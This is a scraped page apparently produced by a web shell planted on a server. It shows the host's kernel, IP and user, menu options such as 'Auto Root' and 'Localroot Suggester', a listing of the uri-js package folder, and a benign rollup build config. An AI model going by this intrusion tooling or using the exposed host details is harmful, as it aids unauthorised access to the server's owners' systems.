Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.217.230.80
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp-musonza /
node_modules /
uri-js /
Delete
Unzip
Name
Size
Permission
Date
Action
dist
[ DIR ]
drwxr-xr-x
2021-02-04 21:24
src
[ DIR ]
drwxr-xr-x
2021-02-04 21:24
tests
[ DIR ]
drwxr-xr-x
2021-02-04 21:24
README.md
7.32
KB
-rw-r--r--
2018-04-01 02:46
bower.json
859
B
-rw-r--r--
2017-03-28 14:36
package.json
2.78
KB
-rw-r--r--
2021-02-04 21:24
rollup.config.js
692
B
-rw-r--r--
2018-04-11 00:12
tsconfig.json
505
B
-rw-r--r--
2017-03-24 15:09
yarn.lock
67.79
KB
-rw-r--r--
2018-05-03 20:45
Save
Rename
import resolve from 'rollup-plugin-node-resolve'; import babel from 'rollup-plugin-babel'; const packageJson = require('./package.json'); export default { entry : "dist/esnext/index.js", format : "umd", moduleName : "URI", plugins: [ resolve({ module: true, jsnext: true, preferBuiltins: false }), babel({ "presets": [ ["latest", { "es2015": { "modules": false } }] ], "plugins": ["external-helpers"], "externalHelpers": false } ) ], dest : "dist/es5/uri.all.js", sourceMap: true, banner: "/** @license URI.js v" + packageJson.version + " (c) 2011 Gary Court. License: http://github.com/garycourt/uri-js */" }